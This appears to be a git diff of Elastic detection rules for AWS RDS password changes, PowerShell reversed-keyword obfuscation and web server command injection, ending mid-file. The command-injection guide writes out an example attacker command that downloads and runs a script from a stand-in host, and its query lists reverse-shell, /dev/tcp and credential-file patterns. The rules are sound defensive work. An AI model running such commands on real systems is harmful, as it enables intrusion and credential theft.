signal of intentional access reconfiguration.\n\nThis rule detects successful password-modification events via `ModifyDBInstance` or `ModifyDBCluster`. Such changes may indicate credential loss recovery\u2014or malicious actions related to persistence, privilege escalation, or defense evasion.\n\n#### Possible investigation steps\n\n- **Identify the actor and execution context** \n - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id`. \n - Inspect `user.name`, `source.ip`, and `user_agent.original` to determine whether the modification originated from expected networks, automation roles, or unusual sources.\n\n- **Determine what was modified** \n - Examine `aws.cloudtrail.request_parameters` to identify: \n - The DB instance or cluster identifier. \n - Whether other parameters were modified in the same call (e.g., `manageMasterUserPassword`, engine version, instance class, parameter group). \n - Review instance metadata in AWS to understand the sensitivity level, environment (prod/stage/dev), and potential business impact.\n\n- **Reconstruct timing and associated actions** \n - Use `@timestamp` to compare the event against: \n - Recent configuration changes such as `ModifyDBInstance`, `ModifyDBCluster`, or networking/security group updates. \n - Other access-related operations (e.g., `AddRoleToDBInstance`, changes to Secrets Manager associations, disabling deletion protection). \n - Check for signs of credential misuse leading up to the event (e.g., `DescribeDBInstances`, `GetCallerIdentity`, unauthorized console logins).\n\n- **Correlate with broader activity** \n - Pivot in CloudTrail using the same access key, principal ARN, or source IP. \n - Look for: \n - Privilege-escalating or persistence-related behavior (IAM policy changes, role modifications, STS session creation). \n - Subsequent DB-impacting operations, such as snapshot deletion, backup retention changes, or cluster deletion. \n - Evidence of data access anomalies (backup exports, data snapshot copies, cross-region actions).\n\n- **Validate intent with operational owners** \n - Confirm with DBAs, platform engineers, and application owners whether the password change: \n - Was requested or scheduled. \n - Aligns with pending migrations, credential rotations, or recovery actions. \n - If not recognized, treat this as a high-risk event requiring deeper containment.\n\n### False positive analysis\n\n- **Recovery or maintenance tasks** \n - Password resets occur during lost-credential scenarios or planned rotations. Confirm if this aligns with a documented workflow.\n- **Secrets Manager integration changes** \n - When `manageMasterUserPassword` is toggled or Secrets Manager rotates passwords, a modification event may occur. Validate whether an automation pipeline triggered the change.\n- **Non-production workloads** \n - Development or staging environments may see frequent password resets. Consider tuning exceptions based on tags, instance identifiers, or IAM roles tied to automation.\n\n### Response and remediation\n\n- **Contain unauthorized access** \n - If activity is suspicious: \n - Immediately rotate the master password again using a secure, validated workflow. \n - Verify whether Secrets Manager integration was disabled (`manageMasterUserPassword=false`) and restore it if necessary. \n - Restrict inbound DB access by tightening associated security group rules or isolating the instance temporarily.\n\n- **Investigate surrounding activity** \n - Review CloudTrail to identify: \n - Who accessed the instance after the password change. \n - Whether any destructive or data-exfiltrating RDS actions occurred. \n - Other IAM or STS activity tied to the same user or session.\n\n- **Restore guardrails and enhance monitoring** \n - Ensure deletion protection, backup retention, and networking controls are correctly configured. \n - Add real-time alerts for password-related modifications and high-risk RDS API actions.\n\n- **Strengthen IAM and operational controls** \n - Limit permissions for `rds:ModifyDBInstance` and `rds:ModifyDBCluster`, especially when modifying authentication parameters. \n - Require MFA and role-based access for DB administrators. \n - Tighten SCPs or Config rules to restrict unauthorized DB configuration changes.\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/).\n", + "query": "info where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"rds.amazonaws.com\"\n and event.action in (\"ModifyDBInstance\", \"ModifyDBCluster\")\n and event.outcome == \"success\"\n and stringContains(aws.cloudtrail.request_parameters, \"masterUserPassword=*\")\n", + "references": [ + "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBInstance.html", + "https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Overview.DBInstance.Modifying.html", + "https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f2015527-7c46-4bb9-80db-051657ddfb69", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS RDS", + "Resources: Investigation Guide", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.001", + "name": "Additional Cloud Credentials", + "reference": "https://attack.mitre.org/techniques/T1098/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "f2015527-7c46-4bb9-80db-051657ddfb69_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_207.json b/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_207.json deleted file mode 100644 index b180d1cabcd..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f30f3443-4fbb-4c27-ab89-c3ad49d62315_207.json +++ /dev/null @@ -1,84 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic", - "Austin Songer" - ], - "description": "Identifies the creation of an Amazon Relational Database Service (RDS) Aurora database instance.", - "false_positives": [ - "A database instance may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Instances creations by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS RDS Instance Creation", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS RDS Instance Creation\n\nAmazon RDS simplifies database management by automating tasks like provisioning and scaling. However, adversaries may exploit this by creating unauthorized instances to exfiltrate data or establish persistence. The detection rule monitors successful RDS instance creations, focusing on specific AWS CloudTrail events, to identify potential misuse and ensure asset visibility.\n\n### Possible investigation steps\n\n- Review the CloudTrail logs for the specific event.action:CreateDBInstance to gather details about the RDS instance creation, including the timestamp, user identity, and source IP address.\n- Verify the user identity associated with the event to determine if the action was performed by an authorized user or service account. Check for any anomalies in user behavior or access patterns.\n- Investigate the source IP address to identify if it is associated with known internal or external entities, and assess if it aligns with expected network activity.\n- Examine the AWS account and region where the RDS instance was created to ensure it aligns with organizational policies and expected usage patterns.\n- Check for any related events or activities in CloudTrail logs around the same timeframe, such as modifications to security groups or IAM policies, which might indicate further unauthorized actions.\n- Assess the configuration and settings of the newly created RDS instance, including database engine, instance class, and network settings, to ensure they comply with security and compliance standards.\n\n### False positive analysis\n\n- Routine maintenance or testing activities by authorized personnel may trigger alerts. To manage this, create exceptions for known maintenance windows or specific user accounts involved in these activities.\n- Automated scripts or tools used for legitimate database provisioning can cause false positives. Identify these scripts and exclude their associated user accounts or roles from triggering alerts.\n- Development or staging environments often have frequent instance creations that are non-threatening. Exclude these environments by filtering based on tags or specific resource identifiers.\n- Third-party integrations or services that require RDS instance creation might be flagged. Review and whitelist these services by their IAM roles or API calls.\n- Scheduled scaling operations that automatically create instances can be mistaken for unauthorized activity. Document and exclude these operations by their specific time frames or automation identifiers.\n\n### Response and remediation\n\n- Immediately isolate the newly created RDS instance to prevent any unauthorized access or data exfiltration. This can be done by modifying the security group rules to restrict inbound and outbound traffic.\n- Review the CloudTrail logs to identify the IAM user or role responsible for the RDS instance creation. Verify if the action was authorized and if the credentials have been compromised.\n- Revoke any suspicious or unauthorized IAM credentials and rotate keys for affected users or roles to prevent further unauthorized actions.\n- Conduct a thorough audit of the RDS instance configuration, including database parameters and access controls, to ensure no sensitive data has been exposed or altered.\n- Notify the security operations team and relevant stakeholders about the incident for further investigation and to determine if additional systems have been affected.\n- Implement additional monitoring and alerting for unusual RDS activities, such as unexpected instance creations or modifications, to enhance detection capabilities.\n- Review and update IAM policies to enforce the principle of least privilege, ensuring that only authorized users have the necessary permissions to create RDS instances.", - "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:CreateDBInstance and event.outcome:success\n", - "references": [ - "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_CreateDBInstance.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "f30f3443-4fbb-4c27-ab89-c3ad49d62315", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS RDS", - "Use Case: Asset Visibility", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "f30f3443-4fbb-4c27-ab89-c3ad49d62315_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_11.json b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_11.json index fb1ce9cc5c8..417c91ca19d 100644 --- a/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_11.json +++ b/packages/security_detection_engine/kibana/security_rule/f33e68a4-bd19-11ed-b02f-f661ea17fbcc_11.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/f38633f4-3b31-4c80-b13d-e77c70ce8254_6.json b/packages/security_detection_engine/kibana/security_rule/f38633f4-3b31-4c80-b13d-e77c70ce8254_6.json new file mode 100644 index 00000000000..7956952d92e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f38633f4-3b31-4c80-b13d-e77c70ce8254_6.json @@ -0,0 +1,158 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies PowerShell scripts that use reversed strings as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential PowerShell Obfuscation via Reverse Keywords", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Reverse Keywords\n\nPowerShell, a powerful scripting language in Windows environments, is often targeted by adversaries for obfuscation to bypass security measures like AMSI. Attackers reverse keywords in scripts to evade static analysis. The detection rule identifies such obfuscation by searching for reversed keywords, replacing them with a unique marker, and counting occurrences. This helps in flagging scripts with multiple obfuscated elements, indicating potential malicious activity.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` field to understand the context and content of the script that triggered the alert. Look for any suspicious or unexpected behavior in the script logic.\n- Examine the `file.path` field to determine the location of the script on the system. This can provide insights into whether the script is part of a legitimate application or potentially malicious.\n- Check the `powershell.file.script_block_id` and `powershell.sequence` fields to identify if the script is part of a larger sequence of commands. This can help in understanding the full scope of the script's execution.\n- Investigate the `agent.id` field to identify the specific endpoint where the script was executed. This can help in correlating with other alerts or logs from the same machine.\n- Assess the `count` field to determine the extent of obfuscation. A higher count may indicate a more heavily obfuscated script, suggesting a higher likelihood of malicious intent.\n\n### False positive analysis\n\n- Scripts with legitimate administrative functions may use reversed keywords for benign purposes, such as custom logging or debugging. Review the context of the script to determine if the usage is intentional and non-malicious.\n- Automated scripts generated by legitimate software tools might include reversed keywords as part of their normal operation. Identify these tools and create exceptions for their known script patterns to prevent unnecessary alerts.\n- Developers or IT personnel might use reversed keywords in test environments to simulate obfuscation techniques. Ensure these environments are well-documented and excluded from production monitoring to avoid false positives.\n- PowerShell scripts used in educational or training settings may intentionally include obfuscation techniques for learning purposes. Exclude these scripts by identifying their unique characteristics or file paths.\n- Regularly update the list of excluded scripts or patterns as new legitimate use cases are identified, ensuring the detection rule remains effective without generating excessive false positives.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further spread of potentially malicious scripts.\n- Terminate any suspicious PowerShell processes identified by the alert to halt ongoing malicious activity.\n- Conduct a thorough review of the script block text and associated files to understand the scope and intent of the obfuscation.\n- Remove or quarantine any identified malicious scripts or files from the system to prevent re-execution.\n- Restore affected systems from a known good backup if malicious activity has altered system integrity.\n- Update endpoint protection and security tools to recognize and block similar obfuscation techniques in the future.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and monitoring of potential lateral movement or additional threats.\n", + "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter for scripts that contains these keywords using MATCH, boosts the query performance,\n// match will ignore the | and look for the individual words\n| where powershell.file.script_block_text : \"rahc|metsys|stekcos|tcejboimw|ecalper|ecnerferpe|noitcennoc|nioj|eman|vne|gnirts|tcejbo-wen|_23niw|noisserpxe|ekovni|daolnwod\"\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"(?i)(rahc|metsys|stekcos|tcejboimw|ecalper|ecnerferpe|noitcennoc|nioj|eman\\.|:vne$|gnirts|tcejbo-wen|_23niw|noisserpxe|ekovni|daolnwod)\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _index,\n agent.id\n\n// Filter for scripts that match the pattern at least twice\n| where Esql.script_block_pattern_count >= 2\n", + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.script_block_pattern_count", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_tmp", + "type": "keyword" + }, + { + "ecs": false, + "name": "_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "_index", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_entropy_bits", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_length", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.file.script_block_surprisal_stdev", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "text" + }, + { + "ecs": false, + "name": "powershell.file.script_block_unique_symbols", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.sequence", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.total", + "type": "long" + } + ], + "risk_score": 21, + "rule_id": "f38633f4-3b31-4c80-b13d-e77c70ce8254", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 6 + }, + "id": "f38633f4-3b31-4c80-b13d-e77c70ce8254_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f3ac6734-7e52-4a0d-90b7-6847bf4308f2_2.json b/packages/security_detection_engine/kibana/security_rule/f3ac6734-7e52-4a0d-90b7-6847bf4308f2_2.json new file mode 100644 index 00000000000..47ff67b0b1a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f3ac6734-7e52-4a0d-90b7-6847bf4308f2_2.json @@ -0,0 +1,260 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects potential command injection attempts via web server requests by identifying URLs that contain suspicious patterns commonly associated with command execution payloads. Attackers may exploit vulnerabilities in web applications to inject and execute arbitrary commands on the server, often using interpreters like Python, Perl, Ruby, PHP, or shell commands. By monitoring for these indicators in web traffic, security teams can identify and respond to potential threats early.", + "from": "now-11m", + "interval": "10m", + "language": "esql", + "license": "Elastic License v2", + "name": "Web Server Potential Command Injection Request", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Web Server Potential Command Injection Request\n\nThis rule flags web requests whose URLs embed command-execution payloads\u2014interpreter flags, shell invocations, netcat reverse shells, /dev/tcp, base64, credential file paths, downloaders, and suspicious temp or cron paths. It matters because attackers use low-volume, successful (200) requests to trigger server-side command injection and gain persistence or control without obvious errors. Example: a crafted query executes bash -c 'wget http://attacker/rev.sh -O /tmp/r; chmod +x /tmp/r; /tmp/r' from the web app, yielding a 200 while dropping and running a payload.\n\n### Possible investigation steps\n\n- Pull the raw HTTP request or PCAP, repeatedly URL-decode and base64-decode parameters, and extract shell metacharacters, commands, IP:port pairs, file paths, and download URLs to infer execution intent.\n- Time-correlate the request with host telemetry for web-server-owned child processes, file writes in /tmp, /dev/shm, or web roots, cron modifications, and new outbound connections from the same host.\n- Pivot on the source IP and user-agent to find related requests across other hosts/endpoints, identify scan-to-exploit sequencing and success patterns, and enact blocking or rate limiting if malicious.\n- Map the targeted route to its backend handler and review code/config to see if user input reaches exec/system/os.popen, templating/deserialization, or shell invocations, then safely reproduce in staging to validate exploitability.\n- If the payload references external indicators, search DNS/proxy/firewall telemetry for matching egress, retrieve and analyze any downloaded artifacts, and hunt for the same indicators across the fleet.\n\n### False positive analysis\n\n- A documentation or code-rendering page that echoes command-like strings from query parameters (e.g., \"bash -c\", \"python -c\", \"curl\", \"/etc/passwd\") returns 200 while merely displaying text, so the URL contains payload keywords without any execution.\n- A low-volume developer or QA test to a sandbox route includes path or query values like \"/dev/tcp/\", \"nc 10.0.0.1 4444\", \"busybox\", or \"chmod +x\" to validate input handling, the server returns 200 and the rule triggers despite no server-side execution path consuming those parameters.\n\n### Response and remediation\n\n- Block the offending source IPs and User-Agents at the WAF/reverse proxy, add virtual patches to drop URLs containing 'bash -c', '/dev/tcp', 'base64 -d', 'curl' or 'nc', and remove the targeted route from the load balancer until verified safe.\n- Isolate the impacted host from the network (at minimum egress) if the web service spawns child processes like bash/sh/python -c, creates files in /tmp or /dev/shm, modifies /etc/cron.*, or opens outbound connections to an IP:port embedded in the request.\n- Acquire volatile memory and preserve access/error logs and any downloaded script before cleanup, then terminate malicious child processes owned by nginx/httpd/tomcat/w3wp, delete dropped artifacts (e.g., /tmp/*, /dev/shm/*, suspicious files in the webroot), and revert cron/systemd or SSH key changes.\n- Rotate credentials and tokens if /etc/passwd, /etc/shadow, or ~/.ssh paths were targeted, rebuild the host or container from a known-good image, patch the application and dependencies, and validate clean startup with outbound traffic restricted to approved destinations.\n- Immediately escalate to the incident commander and legal/privacy if remote command execution is confirmed (evidence: web-server-owned 'bash -c' or 'python -c' executed, curl/wget download-and-execute, or reverse shell to an external IP:port) or if sensitive data exposure is suspected.\n- Harden by enforcing strict input validation, disabling shell/exec functions in the runtime (e.g., PHP disable_functions and no shell-outs in templates), running under least privilege with noexec,nodev /tmp and a read-only webroot, restricting egress by policy, and deploying WAF rules and host sensors to detect these strings and cron/webshell creation.\n", + "query": "from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*\n| where\n // Limit to 200 response code to reduce noise\n http.response.status_code == 200\n\n| eval Esql.url_original_to_lower = to_lower(url.original)\n\n| eval Esql.contains_interpreter = case(Esql.url_original_to_lower like \"*python* -c*\" or Esql.url_original_to_lower like \"*perl* -e*\" or Esql.url_original_to_lower like \"*ruby* -e*\" or Esql.url_original_to_lower like \"*ruby* -rsocket*\" or Esql.url_original_to_lower like \"*lua* -e*\" or Esql.url_original_to_lower like \"*php* -r*\" or Esql.url_original_to_lower like \"*node* -e*\", 1, 0)\n| eval Esql.contains_shell = case(Esql.url_original_to_lower like \"*/bin/bash*\" or Esql.url_original_to_lower like \"*bash*-c*\" or Esql.url_original_to_lower like \"*/bin/sh*\" or Esql.url_original_to_lower rlike \"*sh.{1,2}-c*\", 1, 0)\n| eval Esql.contains_nc = case(Esql.url_original_to_lower like \"*netcat*\" or Esql.url_original_to_lower like \"*ncat*\" or Esql.url_original_to_lower rlike \"\"\".*nc.{1,2}[0-9]{1,3}(\\.[0-9]{1,3}){3}.{1,2}[0-9]{1,5}.*\"\"\" or Esql.url_original_to_lower like \"*nc.openbsd*\" or Esql.url_original_to_lower like \"*nc.traditional*\" or Esql.url_original_to_lower like \"*socat*\", 1, 0)\n| eval Esql.contains_devtcp = case(Esql.url_original_to_lower like \"*/dev/tcp/*\" or Esql.url_original_to_lower like \"*/dev/udp/*\", 1, 0)\n| eval Esql.contains_helpers = case((Esql.url_original_to_lower like \"*/bin/*\" or Esql.url_original_to_lower like \"*/usr/bin/*\") and (Esql.url_original_to_lower like \"*mkfifo*\" or Esql.url_original_to_lower like \"*nohup*\" or Esql.url_original_to_lower like \"*setsid*\" or Esql.url_original_to_lower like \"*busybox*\"), 1, 0)\n| eval Esql.contains_sus_cli = case(Esql.url_original_to_lower like \"*import*pty*spawn*\" or Esql.url_original_to_lower like \"*import*subprocess*call*\" or Esql.url_original_to_lower like \"*tcpsocket.new*\" or Esql.url_original_to_lower like \"*tcpsocket.open*\" or Esql.url_original_to_lower like \"*io.popen*\" or Esql.url_original_to_lower like \"*os.execute*\" or Esql.url_original_to_lower like \"*fsockopen*\", 1, 0)\n| eval Esql.contains_privileges = case(Esql.url_original_to_lower like \"*chmod*+x\", 1, 0)\n| eval Esql.contains_downloader = case(Esql.url_original_to_lower like \"*curl *\" or Esql.url_original_to_lower like \"*wget *\" , 1, 0)\n| eval Esql.contains_file_read_keywords = case(Esql.url_original_to_lower like \"*/etc/shadow*\" or Esql.url_original_to_lower like \"*/etc/passwd*\" or Esql.url_original_to_lower like \"*/root/.ssh/*\" or Esql.url_original_to_lower like \"*/home/*/.ssh/*\" or Esql.url_original_to_lower like \"*~/.ssh/*\" or Esql.url_original_to_lower like \"*/proc/self/environ*\", 1, 0)\n| eval Esql.contains_base64_cmd = case(Esql.url_original_to_lower like \"*base64*-d*\" or Esql.url_original_to_lower like \"*echo*|*base64*\", 1, 0)\n| eval Esql.contains_suspicious_path = case(Esql.url_original_to_lower like \"*/tmp/*\" or Esql.url_original_to_lower like \"*/var/tmp/*\" or Esql.url_original_to_lower like \"*/dev/shm/*\" or Esql.url_original_to_lower like \"*/root/*\" or Esql.url_original_to_lower like \"*/home/*/*\" or Esql.url_original_to_lower like \"*/var/www/*\" or Esql.url_original_to_lower like \"*/etc/cron.*/*\", 1, 0)\n\n| eval Esql.any_payload_keyword = case(\n Esql.contains_interpreter == 1 or Esql.contains_shell == 1 or Esql.contains_nc == 1 or Esql.contains_devtcp == 1 or\n Esql.contains_helpers == 1 or Esql.contains_sus_cli == 1 or Esql.contains_privileges == 1 or Esql.contains_downloader == 1 or\n Esql.contains_file_read_keywords == 1 or Esql.contains_base64_cmd == 1 or Esql.contains_suspicious_path == 1, 1, 0)\n\n| keep\n @timestamp,\n Esql.url_original_to_lower,\n Esql.any_payload_keyword,\n Esql.contains_interpreter,\n Esql.contains_shell,\n Esql.contains_nc,\n Esql.contains_devtcp,\n Esql.contains_helpers,\n Esql.contains_sus_cli,\n Esql.contains_privileges,\n Esql.contains_downloader,\n Esql.contains_file_read_keywords,\n Esql.contains_base64_cmd,\n Esql.contains_suspicious_path,\n source.ip,\n destination.ip,\n agent.id,\n http.request.method,\n http.response.status_code,\n user_agent.original,\n host.name,\n event.dataset,\n data_stream.namespace\n\n| stats\n Esql.event_count = count(),\n Esql.url_path_count_distinct = count_distinct(Esql.url_original_to_lower),\n\n // General fields\n\n Esql.host_name_values = values(host.name),\n Esql.agent_id_values = values(agent.id),\n Esql.url_path_values = values(Esql.url_original_to_lower),\n Esql.http.response.status_code_values = values(http.response.status_code),\n Esql.user_agent_original_values = values(user_agent.original),\n Esql.event_dataset_values = values(event.dataset),\n Esql.data_stream_namespace_values = values(data_stream.namespace),\n\n // Rule Specific fields\n Esql.any_payload_keyword_max = max(Esql.any_payload_keyword),\n Esql.contains_interpreter_values = values(Esql.contains_interpreter),\n Esql.contains_shell_values = values(Esql.contains_shell),\n Esql.contains_nc_values = values(Esql.contains_nc),\n Esql.contains_devtcp_values = values(Esql.contains_devtcp),\n Esql.contains_helpers_values = values(Esql.contains_helpers),\n Esql.contains_sus_cli_values = values(Esql.contains_sus_cli),\n Esql.contains_privileges_values = values(Esql.contains_privileges),\n Esql.contains_downloader_values = values(Esql.contains_downloader),\n Esql.contains_file_read_keywords_values = values(Esql.contains_file_read_keywords),\n Esql.contains_base64_cmd_values = values(Esql.contains_base64_cmd),\n Esql.contains_suspicious_path_values = values(Esql.contains_suspicious_path)\n\n by source.ip, agent.id\n\n| where\n // Filter for potential command injection attempts with low event counts to reduce false positives\n Esql.any_payload_keyword_max == 1 and Esql.event_count < 5\n", + "related_integrations": [ + { + "package": "nginx", + "version": "^2.0.0" + }, + { + "package": "apache", + "version": "^2.0.0" + }, + { + "package": "apache_tomcat", + "version": "^1.9.0" + }, + { + "package": "iis", + "version": "^1.21.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.agent_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.any_payload_keyword_max", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_base64_cmd_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_devtcp_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_downloader_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_file_read_keywords_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_helpers_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_interpreter_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_nc_values", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.contains_privileges_values", + "type": "integer" + }, + { + "ecs": 